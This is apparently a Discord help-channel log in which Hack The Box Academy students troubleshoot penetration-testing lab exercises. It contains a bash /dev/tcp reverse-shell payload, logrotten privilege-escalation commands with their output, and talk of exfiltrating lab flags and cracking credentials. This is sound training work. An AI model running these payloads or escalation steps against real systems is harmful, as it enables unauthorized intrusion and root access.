#modules
Pwnbox, try it
Also defender scans all connected devices
Marcie asked what it was, is all.
I was just being funny
i'm using kali and parrot
We are telling you. Try the same scan using the in-browser vm
This is one of the times where for some reason the pwnbox just works
ok
Turn off the vpn when you use the pwnbox to avoid issues
ok
Can anybody help with? Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer.
I have to get the flag.txt by enumerating all contents of every user from 1 to 20:
But I'm getting nothing.
The default curl command with the example of uid=1 works but in the loop it does not work, why? https://academy.hackthebox.com/module/134/section/1186
hey guys I am trying to sign into an rdp session with proxychains and am prompted to enter the password, which wasn't appearing in the session
Well I edited the script from the course because it's... strange and too "big" for nothing :/.
Do you need to put this in quotes?
linux is going to ignore the $ otherwise, i think
I tried with and without but I did not get an output.
ahh ok
So...
try curl?
I just recreated a script with only one loop.
And just sending request response.
With which UID.
the script they give with curl worked for me
Maybe I did a mistake idk xd.
i think it was a literal copy/paste from the module
Yeah maybe :/.
Could someone explain to me in detail everything that I get with the monthly student subscription of htb academy?
And I want to know if it's worth it and what level of content is there, since I have been using htb machines for a long time and I want to know if the level of this subscription would be worth it for me.
it pretty much explains what you get on the page. i believe it's up to tier2 access for the modules. as far as the content is concerned, it's the best out there to learn
with the student subscription you get access to all tier 0, 1 and 2 modules while you are subbed. Any module you finish during your sub is yours to keep, as well as any cubes you earn by doing that. That's enough to do the path for the CDSA, CBBH and CPTS certs, but not enough for the advanced CWEE cert or any of the other advanced tier 3/4 modules
Hi guys, maybe someone can help me out. I'm trying to sign in with xfreerdp to the provided host to complete the task https://academy.hackthebox.com/module/158/section/1426 but I get prompted for the password for a custom certificate. thanks in advance
logon failure, bad user/pass
2 /u?
You need to surround the password in quotes 'like this' because it contains a special char that's being ignored by the terminal. /p:'pass@123'
Nah he put the password as a second /u:
that too lol
So xfreerdp took the second one as the intended user
We all make mistakes 
I didn't even hope for an answer really, seems like it's a really cool community
Saying that, it would also help my preparation for OSCP, because this summer I plan to do it.
I like it too. It beats OffSec by leaps and bounds.
Well I found it was a ||GET|| request and trying to create a script but how to encode for URL? https://academy.hackthebox.com/module/134/section/1187
just add ##.warning.global.alert-notification-banner to ublock origin
all i did to get that was click ublock->eyedropper->yellow banner btw, enjoy
Found an algo to encode it, but is there no command to do it quickly?
Remote/reverse port forwarding. Via pivoting chapter. Directions show a PowerShell command being done to download the payload, but I see no part of the direction where the engagement initially logs into the internal windows host. It's confusing because I attempted to follow along with the lab, but I don't have creds. I am assuming those creds are the prior chapter. Dynamic port forwarding that was previous. I attempted to proxy chains nmap v pn that same ip, but it's not reflecting a windows RDP port.
Proxy chain nmap v pN -sT 172.16.5.129 doesn't reflect an open RDP port to complete remote reverse port forwarding. Also the questions don't ask to retrieve a flag from this. Is the student meant to copy the example for this particular lab? It's a bit confusing with what's being asked. The two questions were very simple which leads me to think this is just to be shown, not done.
172.16.5.1 and 172.15.5.200 are open but no RDP ports
i missed the hour on logrotate exploitation, not sure how to force another since i cant access /var/lib/logrotate.status or force it; do i have to wait or am i missing something?
an hour??
u waited an hour?
so what i have to leave this running or am i missing something
u can trigger the logrotten btw
aw man ok
u do know which file it is?
so if u write to the file it will trigger the logrotten
idk doesnt seem to be :\
its maxsize 1k and mines 12kb, i think it still waits for the hour doesnt it
logrotten is running in bg rn but i did before yea
what are you doing?
./logrotten -p payload mon.log ?
im pretty sure its not the mon.log
its only file i can write to
i see ~/backups/access.log but theres no logrotate pointing to it
pretty sure its the only one
-rw-rw-r-- 1 htb-student htb-student 9053 Apr 12 21:13 /home/htb-student/mon/mon.log
-rwxr-xr-x 1 root root 141 Mar 7 2019 /usr/lib/rsyslog/rsyslog-rotate
-rwxr-xr-x 1 root root 141 Mar 7 2019 /usr/lib/rsyslog/rsyslog-rotate
-rw-r--r-- 1 root root 1 Jun 14 2023 /var/log/alternatives.log
-rw-r----- 1 root adm 4905 Apr 12 20:49 /var/log/apport.log
-rw-r--r-- 1 root root 1 Jun 14 2023 /var/log/apt/history.log
-rw-r----- 1 root adm 1 Jun 14 2023 /var/log/apt/term.log
-rw-r----- 1 syslog adm 52663 Apr 12 21:16 /var/log/auth.log
-rw-r--r-- 1 root root 1 Jun 14 2023 /var/log/dpkg.log
-rw-r----- 1 syslog adm 261532 Apr 12 20:49 /var/log/kern.log
-rw-r----- 1 syslog adm 723595 Apr 12 21:16 /var/log/syslog
now how do u check if it is /backups/access.log ?
grep -ri /backups /etc/logrotate.d/ ?
have u tried writing to it and see if another access.log.2 appears?
wtf. .
or access.log.1 if it wasnt already there
but why though?
i saw it first thing and thought it was some gotcha because theres no logrotate.d for it ...
ding ding ding u found the correct one
dont worry i was so lost as well
so annoying its the first thing i saw and went on this trail because i thought im so smart... u got me htb devs
oh
i guess i did try this earlier and logrotten just has no output other than "waiting for rotating"
ok got it.. it's because I specified a relative path (just access.log) it has to be ./access.log for the tool for some reason
yeah u got to trigger the rotating by writing to the access.log file
i know, what im saying is the tool requires ./access.log or /path/to/log, just log doesnt work its silently failing
Anyone having issues with RDP? I'm currently doing the Windows Privilege Escalation the section about Legacy OS and I have to RDP into the system but I am getting this error with xfreerdp and Remmina "ERRCONNECT_TLS_CONNECT_FAILED", I've had no issues with RDP before, I've tried resetting the machine a few times to no avail and It's really bugging me
Edit: Tried using rdesktop with no issues. I'm guessing since I'm trying to RDP into a legacy system something about xfreerdp and Remmina are making that difficult. So If anyone else has issues like that in this module try rdesktop
MODULE: Intro to Whitebox Pentesting
SECTION: Skills Assessment
I Found the injection point, but I am having issues crafting a working payload to get code execution. Can I DM someone to see what my code is missing
I think for xfreerdp
You need to add /sec-rdp
Figures that's the only option I didn't try before giving up and using rdesktop lol
I'm working on this thing, we can collab if you want
we can bounce around some ideas, DM?
Sure!
MODULE: Getting started
SECTION: Knowledge check
I have a reverse shell in the user, and on my attacker VM, I ran a python http server in the directory where LinEnum.sh is located.
I then tried running wget to the ip and port with the file, but I always get this error
> wget http://10.10.34.256:8121/LinEnum.sh
Connection to 10.10.34.256:8121... connected
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied
Cannot write to 'LinEnum.sh' (Permission denied.)
Also it says broken pipe on my other terminal
Do you have permission to write to the directory you're trying to download it to?
I don't think so, it says drwxr-xr-x 3
Where can I find a directory I can write in?
what's the user/group perms for the group
/tmp is usually writeable
tysm
It sounds like you found yourself a collaborator already, so I won't detract from the learning process. This skills assessment gives a lot of open ground to explore and feel-out how to arrive at a solution. Rather than be prescriptive about what worked (because that detracts from the core of the problem set), I'll highlight what didn't work for me (so as to save you time). The following assumes you...
- (A) have correctly found an injection point
- (B) Have a local server to test against
- (C) Are correctly navigating through the application's authentication mechanism(s).
All that aside:
- First, I tried to have the server re-write its own code, only to realize I lacked the ability to gracefully restart the server (I could get the server to crash/restart, but that appeared to just erase any edits I made).
- My biggest problem was figuring out where to write the output of any commands I'd push; testing locally, it was trivial to write the output to console.log (but you don't have access to that against the remote server). The vast majority of my troubleshooting efforts was spent working on this problem.
- I thought for sure that I was supposed to use the dead code present in order to read the flag (i.e. somehow leveraging the cat() function to read the flag). While I was able to get such a way working locally, it never succeeded for me against the remote target.
- I also tried having the server make an HTTP request back to my attacker machine, appending the file contents as a b64-encoded URL (e.g. http://attacker/flagcontentsgetappendedhere). This didn't work out either; I didn't investigate this in-depth, but I think this is related to the way the docker instance is configured in what it is(n't) permitted to do.
- Ultimately, what worked for me didn't involve any of the above.
I hesitate to be prescriptive that what you're doing is right/wrong, because the problem explicitly says there are multiple ways about arriving at a solution.
no one here, read the #rules
is it ok if I DM you to run some ideas by you ?
For the life of me I don't know what I'm doing wrong. The second half of the question is confusing me, I'm not sure what they mean by "search for the flag through a JSON POST request to '/search.php'". Any explanation would help so I can figure it out myself
I've tried various versions of
'{"search":"london"}'
"{\"search\":\"london\"}"
have you tried '{search:"london"}'?
it looks like the key isn't in quotes
also why "POST"?
shouldn't it be GET?
oh wait didn't read the Q
Hey, just tried it without quotes on search but didn't work either, same invalid json response.
I take it you're doing an inspect for when you do the search from the admin login
so you can see the request
also in your screenshot
{\"search\":"\london\"}
oh gosh, def haven't tried that, thanks I'll give it a try now
also not sure if you need to wrap the json in the single quotes
but one step at a time
I see now how a single open ; could ruin your day
yeah the misplaced \ was at least the first thing that stuck out to me
then from there it's just modifying the request to get the right search query
also: why do you have ip:port'/search.php'
(i mean if that works it works, just weird to me)
oh my goodness that actually worked, it didn't give the flag but it actually finished the search
i mean you can likely make an educated guess where to search for the flag lol
I will do my best, thank you so much Marcie!
step 1 is just making it work 
INTRODUCTION TO DIGITAL FORENSICS
Quick one
For the Velociraptor section
- 2 Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe
For this we add a new hunt and select artefact [Windows.System.VAD]?
Hey
I am stuck with a problem on buffer overflow. Can someone help?
Now I have no idea what to do but f it we ball
why not start by searching for ||"flag"|| 
istg I'm going to ||reeeeeeeeeeeeeeeee||
I'm laughing and crying rn
is this what it's always going to be like
Thank you so much, oh gosh hahaha
anyone have issues getting a shell with logrotten in the privesc module?
Have you tried triggering logrotate to do its job?
yeah
logrotten is (stating it's) executing
payload has tested with my user, works fine. but not with LR
htb-student@ubuntu:~/backups$ echo "asdf" >> access.log && ./logrotten -o -p ./payload ./access.log
Waiting for rotating ./access.log...
Renamed . with .2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
htb-student@ubuntu:~/backups$ echo "asdf" >> access.log && ./logrotten -s 5 -p ./payload ./access.log
Waiting for rotating ./access.log...
Renamed . with .2 and created symlink to /etc/bash_completion.d
Waiting 5 seconds before writing payload...
same output if i use 2 shells and have it running the whole time whilst i use echo its not a race thing
Looks like you're on the right path I'm not sure why it's not triggering the payload, I did this module a few weeks ago and looking at my notes seem to align with what you're doing. Maybe there are some logrotate experts in here that can identify what the issue is
My next guess would be to double check the payload again but you said the payload seems to be working
I've tried setting up odat.py to interact with the Oracle DB in the Footprinting module twice now, and it's not on the pwnbox by default...
Is there another tool I can use, or some other option?
do you guys ever use vuln scanners for cpts or just in general for ctfs?
why crosspost @sleek moss
because i want to?
im unable to spawn the target exercise for file transfer module
it's been in "spawning" for about 10 mins now
Change your vpn server.
tried, still didn't work :/
Looks like you are sending the echo "asdf" prior to logrotten running. Have you tried to flip what you have or try to ssh in again and sending it separately after you have logrotten running?
yes.
^
its making the symlink but not putting anything in /etc/bash_completion.d
yeah just tried, same output and same thing
Hmmm, maybe try single quotes instead or overwriting the access log completely, Just throwing stuff out there. Odd for sure
seems like you are on the right track
I feel you an echo 'asdf' > should work . I'm guessing you prob already reverted
yeah i took a few hour break and reset it and seems like same thing lol i must be doing something wrong but everyone tells me im doing what they did
and i followed the wiki its a walkthrough section so like... idk how you can even fk it up
feel like i just got a payload to run with a tmux shared socket but i couldnt access it so it was worthless anyway, and i couldnt get it again
yeah it's been a journey for sure , lots of headaches along the way too. lol
I'm also stuck on this. I followed the directions, though I'm not sure why the certificate is listed twice in SAMLRaider.
I've got one certificate with a private key, one without. I'm not entirely sure why we need two of them? Shouldn't there just be one certificate with a private key:true?
Yet I also keep getting redirected to root after re-signing the assertion. The correct certificate (with privatekey:true) is selected.
I checked the MD5 hashes match and they do.
[/tmp/certs]$ openssl x509 -noout -modulus -in pub.crt
Modulus=D4F3076268598F7D3C9162E16554F8BCEBA5AB1FFD89B9B907CE9F3D6C1428A4368B5D8C62DCF4EEDCEE90FCA68AC4C38506AAC89F0AA9BFFA26386678C9C439D4EF48F9873BC9B5655BDE254E8DA0A467FE63FF043EC55B9D9685BAD45CB49E1D548A7D690D93A4B8864F4C57D4ECC13BF24482AF46CC345FF81F9EA92BA097
[/tmp/certs]$ openssl rsa -noout -modulus -in private.pem
Modulus=D4F3076268598F7D3C9162E16554F8BCEBA5AB1FFD89B9B907CE9F3D6C1428A4368B5D8C62DCF4EEDCEE90FCA68AC4C38506AAC89F0AA9BFFA26386678C9C439D4EF48F9873BC9B5655BDE254E8DA0A467FE63FF043EC55B9D9685BAD45CB49E1D548A7D690D93A4B8864F4C57D4ECC13BF24482AF46CC345FF81F9EA92BA097
edit: solved (for me anyway) I was logging in as admin and I don't think that works. try jasmine instead.
https://academy.hackthebox.com/module/103/section/1008#questionsDiv
what input field is vulnerable in this section?
@mint trout u still unable to get a rev shell?
yes, just got a session open in metasploit with a bind shell but it closed instantly when i tried to connect
yeah that happened to me as well, i had like one min after i caught the shell via nc and it closes
cant get a nc shell at all with the gtfobin format
gtfobin format?
and my box just die with 68 mins left ? wtf
yes, this shell https://gtfobins.github.io/gtfobins/bash/#shell
refresh the page
sometimes it glitches out
maybe the rest help
but this is the payload i used for the payload
echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload
yes, tried this one, same from the htb page right
lets try with the reset box maybe i have better luck 1sec
nah same thing lol..
yeee and on first ssh box run the exploit and on the sec ssh box trigger the logrotate and then run the exploit again and trigger it until u catch a shell on nc then on nc u should have like a min so u can make a rev shell and then execute it on it then u would have a shell that wont die
obv u will need to set up two diff nc listeners
u just got to be quick as soon as u get the first shell being root run another rev shell to catch so it wont die
has anyone done the HTB AD skills assessment Part 2? im supposed to escalate to admin and was trying to run the printspoofer from mssqlclient but im trying to figure out how exactly to do that from mssqlclient
i cant even get it though, and the one connection i had closed before i could do anything
im spamming it like you said, not 1 connection
strange yeah i hated that as well, maybe keep on trying
alright ill keep trying thx
i searched the discord, seems like im not the only one but all the people helping say "dm" so i dont know what they did
ye tried that xd and those people last activity was jan 26th
@errant moss @solar cradle where are you guys what did you guys see
Why does HTB xfreerdp not connect, anyone have ideas please
whats the error?
u are doing xfreerdp /v:<ip> /u:<user> /p:<'password'>
Yes
maybe restart the machine
Did you manage to sort this @faint trellis ? I noticed your question in the forums as well. https://forum.hackthebox.com/t/weak-public-private-keys/273935
Opening another session in a private window also didn't help.
edit: I've sorted this now, by logging in as jasmine rather than admin
Hey there! I stuck for a few days on Weak Public/Private Keys section of the Attacking Authentication Mechanisms module, still can't receive the JWT from the response. I have: imported pub.crt and private.pem; changed logged in username value to hackme; assertions successfully signed however my request still attempting to redirect me ba...
i finally got it spamming it the entire time... catting the flag to my folder was easier than a whole shell
LETS FUCKING GOOO
see spamming worked LOL
man i just feel so dumb im immediately stumped at the very next one.. already tried pwnkit and baron samedit and seems like they're patched i dont know what other 2021 kernel exploit they want
i just privesc using the nfs method and steal the flag... its literally 'find the one we want you to use and copy paste it and compile' which i can do anyway so
oh the hint is the cve, i couldnt find it by looking for the uname
lol
lol
win is a win
so you writing notes for academy? i take notes for boxes but not really sure what to even really write down here lol
not the boxes themselves but on the commands and what they taught me
on the box when i get stuck and i see something that can clarify more on my notes then i will write it
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I'm doing the sessions challenge #2 under Metasploit and I've obtained a shell...but I can't run whoami or any other command I've found to figure out who I'm logged in as after using the exploit?
[-] Unknown command: whoami
Nevermind. I just cat'd /etc/passwd and started spamming usernames XD
Now I can't check the sudo version XD
[-] Unknown command: sudo
you need to type shell first.
Ah...you the man!
nmap is showing SNMP V3, so I thought I needed a username and password to do snmpwalk. But I was able to run it with V2
is there anybody who has completed the Password Attacks - Hard lab that I could have a quick DM with pls to get some help with initial access? Have been at this for hours, want to at least validate that I'm doing the right thing if possible please
hello can someone help me i am stuck here
also tell us the modules name so people can help
Cross-Site Scripting (XSS) in the bug bounty module
xss discovery
u can also use the hint button if that helps
sadly it dont
patience it is then
How to do the last question of Infiltrating Windows, can anyone tell me
How to do the last question of Infiltrating Windows, can anyone tell me
If you want help here, it helps if you say in which module, which section and for which question you tried what exactly.
If you simply post a question from the modules, nobody will probably know exactly where you are. The chance of getting help decreases rapidly
In SHELLS & PAYLOADS
and what exactly did you try? What does not work?
I typed MS17-010 with msf doesn't work, then I uploaded aspx on port 80 doesn't work either
There are several ms17-010 exploits
Try another exploit
Hi!
Who knows what kind of replacement there is for the module:
Introduction to Python3
In the description of one of the modules, it is advised to pass it.
But I couldn't find it.
I think I've had a false positive for the Password Attacks Lab - Hard which after almost 2hrs of waiting for it to crack is a real bummer :/ anybody able to give me a hand with this initial access please?
Introduction to Python3: https://academy.hackthebox.com/module/details/88
yes. I use the execute command that works.
great
Look at all the services and think about how you could attack each one. The question gives you a user name.
is it meant to take several hours to get a credential for said user?
I didn't write down how long it took, but I don't think it took that long
it doesn't take that long at all, less than 30 mins
make sure you're using the lists from the module too
I'm using the mutated password list from the module resources yeh
what service are you attacking
rdp
Try another service
I tried SMB first, moved to RDP after not hitting anything in the first hour
There are other services
i was able to do it with RDP. if going the RDP route i would recommend using the tool crowbar, as it's faster than the tools mentioned in the module.
lowercase or uppercase J?
I'm going to reset the box and see if that changes anything
it worked....
got the creds in about 7 mins (ty for the tip on Crowbar for RDP as well) - same wordlist and everything
idk what was happening before but it is what it is haha thanks!
Guys I am still stuck with Password Attacks - Lab Hard
I have managed to get the user d**** password, I am trying to transfer the file but none of the methods are working
smbclient method is giving me an error of connection timeout
I tried over FTP on the attacked machine but files just won't transfer
Lower worked fine for me
I like using Remmina for RDP, it has an option to share a folder. You can do the same with some command with xfreerdp (/drive:local_folder,remote_folder i think).
makes it really simple
Thanks ! Will try it now
Will you be able to switch users?
hi
What do you mean? It's an RDP client. You can save sessions and save multiple users or whatever.
not necessarily, but have a think about other ways with the session you have that you can make that file accessible to your compromised user
Switching from J*** to D*** to be able to transfer the file
Lets see , Thank btw!
That doesn't really have anything to do with the client I think... there are a few ways to pull that off.
Hey, I am stuck on the last question in HTB Academy DNS Footprinting: "What is the FQDN of the host where the last octet ends with 'x.x.x.203'?"
i found the ip with ....203 but it looks like an incorrect answer!
any idea ?
thanks thanks
You can DM me your answer if you want, but it will accept the right answer. I can tell you if your answer is correct or not.
Can someone provide any hint for the challenge "pdfy"
tried to install and configure SELinux as suggested by the module and it rekt my VM
good thing I keep snapshots

Tried using CMD with D**** users to Copy the file to J*** and then use the RDP shared folder but the access is denied

have a think about other ways you could access what you're trying to access with the creds you've got
maybe think less like a hacker and more like a user - how would they go about what you're trying to do here? 
Windows Button, Switch user
But this option is not showing haha
haha not this way, another way
I would recommend reviewing the Pass the Ticket from Windows section
Tyyym to dump those hashes 
hello i need help pls for the hard skill assessment of attacking common services. when i connect with this cmd sqlcmd -S WIN-HARD -U fiona -P 'pwd' -y 30 -y 30 it doesn't work but when i use just sqlcmd it works!! then when i want to find information on the system it doesn't work, why? my cmd: EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
Try executing as someone
When connecting or searching for information?
marcie, how is cpts path going, i see u r very active in here, i havent done anything for 2 months or so
Same. Been busy with other stuff
but now im gonna finish off PW Attacks, only the hard lab left
I havent done anything related to pw lab in a week
yea imo this one is so much stuff to learn in there compared to other modules, so its kinda brain exhausting
I had/have a second interview+ moved countries+ got ill+ didnt bring my pc with me since ill be buying a new one
But i heard it just takes time which i dont have it atm
yes, im learning rn not to rush anything, cuz its my biggest flaw, doing something 24/7 for weeks and then i need few weeks a break, instead i try to do a bit per week constantly
good luck
I'd like to but I've tried to recover all the hashes thanks to responder, it only gives me Fiona's, and how can I spoof if I can't even log in, I've tried brute force simon there's nothing
No need for hashes
You start with fiona
Impersonation is something that can be done within mssql
I want to do the usurpation but it doesn't work :
Well perhaps you're trying as the wrong person
Think to the questions and if you've answered one you have the name
i'm retrying
Try restarting the box. But you're close
hi, does someone know how to connect to the linux machine in the kerberos attacks module? I am trying to connect to the linux machine in the "kerberoasting from linux" section and it's not working, i should use this "Authenticate to 10.129.205.35 with user "htb-student" and password "HTB_@cademy_stdnt!" but when i am trying to use ssh it's not working, i tried to add 10.129.205.35 inlanefreight.local to /etc/hosts but it's not working too, do u have any ideas?
is ssh mentioned explicitly?
no
it just this line "Authenticate to 10.129.205.35 with user "htb-student" and password "HTB_@cademy_stdnt!"
why don't you scan the target to find out what it is?
i scanned
how do i use this website
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Who can I contact for help with the INTRO TO WHITEBOX PENTESTING SA 1 solution? I'm at the payload implementation stage and I'm having some difficulties that I haven't been able to solve for a long time.
sure
Hello colleagues, I am in the footprinting hard lab module, I have already enumerated the SNMP service and I have the private key and I have the user to access the host but I can't find the HTB user
Keep looking around. The path to the end is a lot of back and forth
Transferring files back and forth cracking passwords to move forward
@fathom pendant You mean I'm going for a good ride?
do it manually
I'm doing a module and it asks to spawn a target, but there is no such button/option available. I logged out, refreshed, any ideas ?
Hi all, can someone please help me with the NoSQLi skill assessment 2?
at the bottom there should be a green text saying spawn target i believe
Definitely one of the more satisfying skill assessments
found it, thanks, guess I am clinically blind
lol np
I'll continue on my way to find that answer because I feel like I'm close @fathom pendant
im in PW Attacks Hard lab, i am trying to copy a file from the Windows machine to my linux through xfreerdp, it wont work tho, but from linux > windows it works, thats kinda holding me up rn.
the last msg about the clipboard
What is not working?
anyone can help with advanced sql injections skills assessment part 2? have a script that allows me basically to do all techniques for uploading files and running them. but nothing works. i think it could be a permission problem, tried already to upgrade permissions. nothing works. any hints or confirmation for the expected technique to work?
@frozen stone dont randomly DM pls
I can help you, dm ok?
use this option in xfreerdp /drive:linux,/home/urdirectory
and on the windows machine open \\tsclient\ in file manager
this mounts ur local drive on the machine
Is your SQL injection correct?
thy
is someone able to assist me with a module chapter in web attack im not sure what im doing wrong i can share my screen
thx for reply, got already help. was missing some byte multiplications.
Hi all
Any hints for the following question on the powerview module?
The group looks empty when I use powerview and Get-Net/DomainGroupMember
-ComputerName WS01 you use this?
Yeap
-GroupName use this instead of Identity and try with full group name too
and its a localgroup
So thats probably the issue
Still errors out
You have to use different command to enumerate local groups
Parameters are fine
Ill just say that the command doesnt differ much
Found it thanks
any way to disable this?
when you finish a module it becomes impossible to close the share your achievement window because the x is hidden underneath the gold warning bar
delete with ublock origin
oof
hey guys, can anyone help me toward the answer to a question?
any good tool for keepass .kdbx file in linux terminal?
im on the nmap module and they are asking to enumerate a hostname, im kinda lost on that, should i look for specific services or is it a certain script that allows me to do that?
helloo, help please
There's a 2john for that
You need to specify port
yeah already got the pw, i mean for reading the entries now
instead opening it on the target windows
Perhaps it's on the target system
Also: you know the name of the program
It's the same as the windows
can not finish my task because RDP session disconnects all the time
i used keepass2john to get the pw, then ive read the contents in the windows environment, but i wonder if i can also read it on my linux terminal
/timeout:10000
You tried using tcp vpn?
Try: keepass
It's a password storage database
trying from my machine and HTB all the same, right now can not even connect "[10:27:40:301] [14769:14770] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:27:40:301] [14769:14770] [ERROR][com.freerdp.core] - failed to connect to"
thanks very much
Not installed on my Kali, I'm gonna look out for it
trying to connect with that command "xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:10.129.235.179 /dynamic-resolution"
Try adding /timeout:10000 if it's timing out
Or reset the target and try again
thanks!
Hi
Does anyone know how to do this?
I haven't done the module, is there more context?
Not really, I have an IP with some open ports, they're asking me to enumerate the hostname
I think I'm not using the correct scripts
because it's the IP that pops up, not the hostname
Can you link the module?
Some scripts may work or good ole just looking at the exposed webpage
If there is one
Yeah! I tried that, it's just an Apache2 server
I think they just want me to use the nmap tool, since it's the Nmap module
Sometimes nmap won't catch everything
Enumerating a hostname to me says gobuster tbh
That's domains
And subdomains
I want to enumerate the actual hostname
A host name would be like WS001
Oh, I didn't see the full question, "Enumerate the hostname of your target and submit it as the answer."... if someone just told me to 'enumerate the hostname' I would assume they just mixed up hostname and domain, I know the difference lol
Is there a tool from John to extract a .vhd hash?
it must be on one of the services
I figured
Sht. I started my writeups on firewall evasion.
Can you send a screenshot of your output?
Nah, it's not NetBIOS
Brb let me boot up my machine and check
FYI I just got this using nmap alone
-sC
Try using the -sC -sV flags
Yeah. -sC is most likely missing
why?
-sC runs basic enumeration scripts
yeah, it was missing
Based on the discovered ports
I know, but what does it do?
@cedar forum try doing your same nmap with -sC and -sV and report back
It does this @cedar forum
got the hostname
ahhhhhhh
Which one is for .vhd
I'm a bit lost xD
see: nmap --script-help default
mine was on port 31337
no enumerating required, just -sC / -sV
Run file on the .vhd to see what it's encrypted with
but a win is a win is a win
I believe that's for a different question
Hi guys! Doing the intro to pentesting
I am at this question
the hostname of the target?
Payment Card
that made me more confused XD
Yes I don't recall hostname being on the 31337
you are half right
It might need the -DSS at the end
that was it lol, I was trying ||PCI DSS||, without the -
meh
That's on port 445 bro
???
31337/tcp open ftp ProFTPD
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
thanks a lot, didn't know it needed the -
xD
it's ProFTPD info
Oh wait your comically large circle made me miss things
xDDDDDD
I forgot to turn down the brush size in Paint 3D lol, sorry, blame Microsoft for removing MS Paint
I missed the separation after 445 to 31337
idk, it's underneath 31337 but yeah, there are many ways to do this it seems, and now carpetes knows 2 more
Is it normal that I'm still confused about what most of these flags do after this section? xD
yes
Nmap has a powerful scripting language called NSE; -sC is the same as --script=default, which just runs a bunch of scripts, one of which gathers more info
-Pn runs the scan even if the target isn't pingable, and I think -n stops name resolution or something
Yes, that I know
So, you'd want to use -n when you don't want domain resolution? (for some reason?)
NSE is a pain to set args for
Alright, team, I need a hint on the Information Gathering - Web Edition - Skills Assessment. I'm attempting to identify the host name of a target server. The instructions, thus far, have not specifically mentioned host names and I'm not really sure how I would do that? Any advice? What do I need to re-read?
My first thought was dig and whois, but that didn't find it.
Next was curl -I $TARGET to see if it was leaked out via headers or something, but nothing there.
The third question?
Pretty sure thats the correct command
yes, question 3.
Let me... re-try it?
maybe I just over-looked it.
What is the question asking you to find? Which field?
The URL is under Location
The question it's asking is: "What server name is returned for the host?" Hint: there is a 5 in the FQDN.
It's not asking about the URL
oh
Server then?
@fringe urchin the x-served-by?
Do you have a field that tells you the server: name?
No
It's in front of you
No need. I see the correct answer in your screenshot
The question is asking for a server name
So maybe your response got something like
Servername: xxx xxx
Or
Server: xxx xxx
Etc
OK, here's the thing. I've tried that, and it didn't work for me and it doesn't match what I got in the hint. I'll try it.
OK. Why did that work now?
Hi, I have a generic question on the Windows privesc module / DLL Injection. I understand how DLL injection works, however I don't understand how a user can attach a DLL to a system process? Can we somehow check the rights our current user has on running processes?
I have no clue what the hint means
Maybe you misspelled it or added a whitespace at the end?
I remember a question asking me to give the NTLM hash of a user I had, but it was incorrect. Then it randomly worked a few minutes after.
Hi everyone. If I buy the exam ticket for "HTB Certified Web Exploitation Expert", do I have the whole study path as well or not?
@fringe urchin weird... fkn gremlins, ya'll.
Hey! So I've just completed the first module of the Pentest job path, the module in which the whole process of pentesting is explained.
I am a bit lost at the final part
So, in this job role path, should I continue with the modules that the job path has? Or should I do 1 technical module and 1 offensive, then do 3 retired machines and so on (whatever it says in the above picture)?
Yeah, continue.
That only gives you an example, which is explained further down as well
You don't need to do other machines etc. to prepare for CPTS. The module will fully prepare you
Yes, I read it, but didn't understand exactly if one technical module and one offensive is included in the job path
Or is it something that I have to do besides the job path, to practice what I learn
Ok
Thank you sir!
Sorry guys, I just started to study HTB after TryHackMe. The RDP connection disconnects all the time, I tried timeout, restarting doesn't work, the machine pings well, I cannot finish my task. Is it only me who has that problem?
You don't need to.
There are Pro Labs which are "similar" to the CPTS path but they can over-prepare you / have stuff in them which isn't covered in the path.
Some people recommend those, some say not needed.
For me tcp vpn solved the problem.
I have a question
Can I learn complete hacking with Hack The Box?
Except watching videos on YouTube and not learning it completely because YouTube doesn't allow it
Yes, for example the CPTS path will prepare you for a penetration test job
Wdym
Can I learn, like, how to make malware for educational purposes and defend against it for free?
There is an exam/path in hack the box that will teach you to make a penetration test on target/targets
Oh
Does it teach offensive and defensive both?
Can someone help me on Password Attacks Lab - Hard? I can't extract the hash of the VHD with bitlocker2john (signature not found)
There's an offensive path and defensive path
Oh thanks, and does it teach with videos, but not videos on YouTube?
Are you running it with python2?
No videos
I don't know
That specific path, no. But there is another one called the security analysis certification which is defensive
Does that specific path only teach offensive?
And is it for free?
I have both installed I think
Yes, the CPTS path (penetration tester) only teaches you offensive.
No, it's not for free
https://academy.hackthebox.com/paths/jobrole
You need cubes to buy the needed modules to complete it, I think one Plat and one Gold should be enough?
Or if you have an EDU email (from uni) it's like 8€ per month
Plus then the exam voucher which is around 200€?
Thanks, it works! Didn't expect that TCP works better for the RDP connection
hey, last question, sorry for bothering. When should I start with the Starting Point in labs?
Am I intended to do some specific modules from the academy? Or can I do them alongside the pentest job path?
I tried telling you this a few hours ago
#modules message
Sorry, my fault
You mean Pro Labs/Endgame?
Usually people do them before they do the exam, so after they did the majority if not all of the modules
No, I mean:
That's not needed to progress in the module, sure if you want to learn a bit more you can do it, I personally didn't even know it existed lol
HTB changed from the last time I was active. I remember you needed to hack yourself the invite link or whatever it was
Then did as many as I could to get to Hacker rank, then life got busy, until now. On Monday the interviewers I had an interview with are gonna call me again
Sadly nothing cyber related but if it's my first job I'm taking it
Good luck
Frfr I remember I had the correct mindset there but because of lack of knowledge I couldn't get the last thing to work so had to watch a YT video on how to get in
Tyty, should be something like cloud eng, still interesting
If you want to make malware then go to maldevacademy
Oh yeah, same
didn't know what I was doing back then
Yeah lol, then I remember some easy boxes I was stuck on because the only "really" thing you could learn from was ippsec. Dude was/is great. I remember being stuck for more than a few weeks on an active easy box. Did it at the end lol. Had such a great time. Ngl from what I remember and from what the academy CPTS path covers in the beginning you should be able to solve 99% of easy boxes
Everything I remember is covered in the footprinting
Will soon be more active on the boxes again once I buy myself a new computer
Password Attacks Hard Lab
